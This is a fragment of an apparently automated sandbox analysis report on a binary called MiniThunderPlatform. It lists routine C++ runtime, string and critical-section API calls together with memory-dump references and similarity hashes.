                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 1391971735-3788999226
                                                                                                                                              • Opcode ID: f76038e0a7e7713f1ce3a677321a30c8af60b7d0373ebf5e8385694ab2f6c8e1
                                                                                                                                              • Instruction ID: bd64fd1a6b78c5e4832ec5c8e9be5b5da15a36d42d5d4a8eea1328878ebc5b3b
                                                                                                                                              • Opcode Fuzzy Hash: f76038e0a7e7713f1ce3a677321a30c8af60b7d0373ebf5e8385694ab2f6c8e1
                                                                                                                                              • Instruction Fuzzy Hash: E4E0ECB6810218DBC711DBD0CC89AEEB778FF2D352F804118E007B6444DB716658CB36
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 100355EE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 7316c0d8710fcdf122c426525d1826c2ccab378783d2a1111babaff485a26772
                                                                                                                                              • Instruction ID: ff1401d07f7960192ef95f6cf5d1cae11a8d3068f7b6878b899faead68df9c39
                                                                                                                                              • Opcode Fuzzy Hash: 7316c0d8710fcdf122c426525d1826c2ccab378783d2a1111babaff485a26772
                                                                                                                                              • Instruction Fuzzy Hash: A3819475A006069FC725CF69C884A9B77E6FBC4256F14C62DEC1ACB354E631F901CB90
                                                                                                                                              APIs
                                                                                                                                              • memmove.MSVCR71(?,?,00000000), ref: 10069526
                                                                                                                                                • Part of subcall function 1005F9B0: memmove.MSVCR71(00000000,?,0000001C,?,0000001C,?,00000000,00000000,0000001C,1006439B,?,00000001,?,?,?,00000000), ref: 1005FA84
                                                                                                                                                • Part of subcall function 1005F9B0: memmove.MSVCR71(00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 1005FAAB
                                                                                                                                                • Part of subcall function 1005F9B0: ??3@YAXPAX@Z.MSVCR71(?), ref: 1005FACE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memmove$??3@
                                                                                                                                              • String ID: .\io_manager.cpp$new_request_ptr$thunder_assert
                                                                                                                                              • API String ID: 2321372689-1330268826
                                                                                                                                              • Opcode ID: ee44c6bcf0ddc49be505b82dc0361f237c7fe71eb8b4f67cf10329cc428adbd1
                                                                                                                                              • Instruction ID: cee98619318f82b792dc7987a6735653fd71923ecafbabb3f67a2add3132aaae
                                                                                                                                              • Opcode Fuzzy Hash: ee44c6bcf0ddc49be505b82dc0361f237c7fe71eb8b4f67cf10329cc428adbd1
                                                                                                                                              • Instruction Fuzzy Hash: 77814770A097429FC714CF29C58095AFBE6FFD8350F508A2DE98A87B10E730E941CB82
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000003,?,00000003), ref: 100840D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3947435496-0
                                                                                                                                              • Opcode ID: 4b0c7053503d220348113edfe93fcd43c828805e2831b650785251516fc38e38
                                                                                                                                              • Instruction ID: c15da9e6f12c07865908d6ba10d4668c866306541aadba3bedf7b0adfe2221e5
                                                                                                                                              • Opcode Fuzzy Hash: 4b0c7053503d220348113edfe93fcd43c828805e2831b650785251516fc38e38
                                                                                                                                              • Instruction Fuzzy Hash: E051A2367002005BCA00DB09EC81EABB3E9FFD9A15F04445FF98597251DA62ED19C6B2
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,00000014,?,?,?), ref: 100580E7
                                                                                                                                                • Part of subcall function 10057AD0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?,?,?,?,?,?,?,?,?,?,?,102452A2,000000FF,10057D3D,?), ref: 10057AFD
                                                                                                                                                • Part of subcall function 10057AD0: ??0exception@@QAE@XZ.MSVCR71 ref: 10057B0F
                                                                                                                                                • Part of subcall function 10057AD0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10057B2B
                                                                                                                                                • Part of subcall function 10057AD0: _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 10057B48
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@D@2@@std@@$??$???0exception@@D@1@@std@@D@2@@0@0@ExceptionThrowV01@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3789410778-0
                                                                                                                                              • Opcode ID: 1118e550b501fdacbd25adb775084ba38838535799a2c0eb79099addd54962a1
                                                                                                                                              • Instruction ID: 802da77eaebbc9c26c3608ad0cda91b7723ad6c456dad05fe2c743b50a83c133
                                                                                                                                              • Opcode Fuzzy Hash: 1118e550b501fdacbd25adb775084ba38838535799a2c0eb79099addd54962a1
                                                                                                                                              • Instruction Fuzzy Hash: EF51A33A3002005BC600DB09EC81EAFB3E9EFD9A55F04455EFD49A7241D662EE1DC7B6
                                                                                                                                              APIs
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,00000000,?,10311FB4,00000000,00000000,?,?,?,?,00000000,10245138,000000FF,10055A0B,?), ref: 10055677
                                                                                                                                                • Part of subcall function 10054F60: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,00000000,?,?,?,?,?,?,?,?,?,?,10245122,000000FF,100552DD,?), ref: 10054F8D
                                                                                                                                                • Part of subcall function 10054F60: ??0exception@@QAE@XZ.MSVCR71 ref: 10054F9F
                                                                                                                                                • Part of subcall function 10054F60: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10054FBB
                                                                                                                                                • Part of subcall function 10054F60: _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 10054FD8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@D@2@@std@@$??$???0exception@@D@1@@std@@D@2@@0@0@ExceptionThrowV01@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3789410778-0
                                                                                                                                              • Opcode ID: 41d71b7a1eb3de20970307da4029ca60f3fdd9365190e1081fa608bce4a1e9e2
                                                                                                                                              • Instruction ID: 0fe4f5f2e4882a3cb1c1772c7f5c950518104c2eddf394ef1984c607b141c9c1
                                                                                                                                              • Opcode Fuzzy Hash: 41d71b7a1eb3de20970307da4029ca60f3fdd9365190e1081fa608bce4a1e9e2
                                                                                                                                              • Instruction Fuzzy Hash: BE51A37A3042049BC600DB09EC91EAFB3E9EFD9A16F14416EF944DB241D662ED1DC7B1
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 1005935B
                                                                                                                                                • Part of subcall function 10173FF0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?,?,00000000,1005901A,?,1005BF55), ref: 1017400D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 10059555
                                                                                                                                                • Part of subcall function 10056A40: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,1030012C,?,00000028,00000000,00000000,10059399,?,?,?,?,?,?,?,1030012C,?), ref: 10056A5A
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100593D7
                                                                                                                                                • Part of subcall function 10056A00: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,00000000,00000000,00000000,?,00000028,100593A8,?,00000003,?), ref: 10056A1A
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                                • Part of subcall function 10173A00: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(0000000D,?,00000000,00000014,?,00000014,10173FFF,?,00000000,?,00000014,10058B6A,1005BF55,00000000,?,?), ref: 10173A25
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 10059501
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@1@@std@@D@2@@0@0@V?$basic_string@$??$?$??$?8CriticalSection$??1?$basic_string@??3@CountD@2@@std@@EnterLeaveTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1304188127-0
                                                                                                                                              • Opcode ID: 3bb04e9556195999fff00aa84da7c4b781fbe3b6024a0b969a7db7d356018f32
                                                                                                                                              • Instruction ID: a91ac9e02f9c10f1cca5bc14aeffaba4e7cec129752ec8682b601cc42b1f0653
                                                                                                                                              • Opcode Fuzzy Hash: 3bb04e9556195999fff00aa84da7c4b781fbe3b6024a0b969a7db7d356018f32
                                                                                                                                              • Instruction Fuzzy Hash: AA5181742046419BCB54DF24C985B6FB7F9FF85284F41491CF98A97292EB30EC49CBA2
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5761
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5773
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5785
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A579A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@V12@@$??1?$basic_string@$?erase@?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 689347063-0
                                                                                                                                              • Opcode ID: 89a888e59fafa3b9b06945bcca80367995ae8f294ab5b8f7931528a02c83c75d
                                                                                                                                              • Instruction ID: 9dc8e614902463b5e30f0387ff6a7c78661d9f46ecb7d15c91953bf41b5ea050
                                                                                                                                              • Opcode Fuzzy Hash: 89a888e59fafa3b9b06945bcca80367995ae8f294ab5b8f7931528a02c83c75d
                                                                                                                                              • Instruction Fuzzy Hash: 1A516175204740DFD324DB69C898F9BB7E9FB89700F444A1DF59A87291DB70A904CB62
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100253F3
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
                                                                                                                                                • Part of subcall function 1002B1FA: __EH_prolog.LIBCMT ref: 1002B1FF
                                                                                                                                                • Part of subcall function 1002B1FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?), ref: 1002B215
                                                                                                                                                • Part of subcall function 1002B1FA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1002B233
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100254DE
                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10025483
                                                                                                                                                • Part of subcall function 100249A9: __EH_prolog.LIBCMT ref: 100249AE
                                                                                                                                                • Part of subcall function 100249A9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CXlData,?,?), ref: 100249C5
                                                                                                                                                • Part of subcall function 100249A9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(2CDAD45E), ref: 100249E4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 100254B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@H_prolog$CriticalSection$EnterLeavemalloc
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000,?,?,?,?,?), ref: 1003436D
                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?), ref: 1003437A
                                                                                                                                              • AtlComPtrAssign.ATL71 ref: 1003438D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(-00000004), ref: 10034438
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign$CriticalEventLeaveSection
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C42AC
                                                                                                                                                • Part of subcall function 100C3603: __EH_prolog.LIBCMT ref: 100C3608
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3616
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3625
                                                                                                                                                • Part of subcall function 100C3603: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3634
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C3643
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C364E
                                                                                                                                                • Part of subcall function 100C3603: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000,?,100C42D0,?,?,?,?,00000000,00000000,00000000), ref: 100C365F
                                                                                                                                                • Part of subcall function 100C3678: __EH_prolog.LIBCMT ref: 100C367D
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C3693
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C36A0
                                                                                                                                                • Part of subcall function 100C3678: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100C42FB,?,00000000,00000000,00000000), ref: 100C36AC
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,00000000,00000000), ref: 100C4312
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 100C4321
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 100C4330
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??$?8??0?$basic_string@??1?$basic_string@?assign@?$basic_string@D@1@@std@@D@2@@0@0@H_prologV12@V12@@V?$basic_string@
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000416A
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10004199
                                                                                                                                              • memcpy.MSVCR71(?,?,?), ref: 100041B8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100041C3
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$memcpy
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10035337
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003535D
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100353B2
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100353CF
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1004804B
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10048071
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10048089
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 1004809E
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100702A6
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100702CC
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10070319
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10070335
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10059179
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,76105E10), ref: 100591B5
